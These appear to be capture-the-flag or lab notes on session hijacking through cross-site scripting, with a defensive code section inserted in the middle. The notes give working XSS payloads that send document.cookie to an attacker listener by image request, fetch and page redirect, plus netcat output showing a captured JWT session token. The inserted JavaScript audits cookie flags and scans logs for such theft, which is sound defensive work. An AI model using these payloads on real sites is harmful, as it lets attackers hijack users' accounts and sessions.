Cookie/Session Hijacking

web, xss

Intercepting via netcat

nc -nlvp 4444
<script>new Image().src="http://10.11.40.33:4444/bogus.php?output="+document.cookie;</script>

➜  marketplace nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.40.33] from (UNKNOWN) [10.11.40.33] 57706
GET /bogus.php?output=token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoiZGVtbyIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjI4MTU5MzYzfQ.Nka6_SPBNEE1B3PmDWg4p7c3cG3BF4zqhTMCgGa6bJM HTTP/1.1
Host: 10.11.40.33:4444
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://10.10.177.20/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
# using fetch
<script>fetch("http://10.11.40.33:4444/"+document.cookie)</script>
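Added here as a defender's counterpart to the capture above (example code, not part of the original notes): a Set-Cookie audit that flags the missing HttpOnly attribute that lets document.cookie expose the session token, and a scanner that picks cookie-shaped query strings with JWT-looking values out of access-log request lines, which is the signature the listener output shows. The sample header, sample request line and the JWT regex are constructed assumptions for illustration.

```javascript
// Added example (not from the original notes): defender-side checks for the
// cookie-theft pattern shown in the netcat capture above.

// JWTs are three base64url segments; the header segment encodes '{"', i.e. "eyJ".
const JWT_RE = /^eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+$/;

// Returns the hardening attributes missing from one Set-Cookie header value.
// HttpOnly is the one that stops document.cookie from reading the token.
function auditSetCookie(header) {
  const attrs = header.split(";").slice(1).map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes("httponly")) missing.push("HttpOnly"); // readable by script
  if (!attrs.includes("secure")) missing.push("Secure");     // sent over cleartext
  if (!attrs.some((a) => a.startsWith("samesite="))) missing.push("SameSite");
  return missing;
}

// Given one access-log request line ("GET /path?qs HTTP/1.1"), return the names
// of query parameters whose value is a cookie string carrying a JWT-shaped value.
// Empty array means nothing suspicious; malformed percent-encoding is skipped.
function findCookieExfil(requestLine) {
  const m = /^[A-Z]+ [^\s?]+\?(\S+) HTTP\//.exec(requestLine);
  if (!m) return [];
  const hits = [];
  for (const pair of m[1].split("&")) {
    const eq = pair.indexOf("=");
    if (eq < 0) continue;
    let value;
    try { value = decodeURIComponent(pair.slice(eq + 1)); } catch { continue; }
    // document.cookie yields "a=1; b=2", so inspect each embedded cookie value.
    for (const cookie of value.split(";")) {
      const cEq = cookie.indexOf("=");
      const cVal = (cEq < 0 ? cookie : cookie.slice(cEq + 1)).trim();
      if (JWT_RE.test(cVal)) { hits.push(pair.slice(0, eq)); break; }
    }
  }
  return hits;
}

// Constructed sample inputs (assumptions, not taken from any real system).
const SAMPLE_SET_COOKIE = "token=abc123; Path=/";
const SAMPLE_REQUEST =
  "GET /bogus.php?output=token=eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoxfQ.c2ln HTTP/1.1";

console.log("missing attributes:", auditSetCookie(SAMPLE_SET_COOKIE));
console.log("exfil parameters:", findCookieExfil(SAMPLE_REQUEST));
```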

Redirect to another page

# 10.10.39.208 - victim ip
<script>document.location='http://10.10.39.208/log/'+document.cookie</script>

Other payloads

# sent by server -> cookie: denied
cookie: granted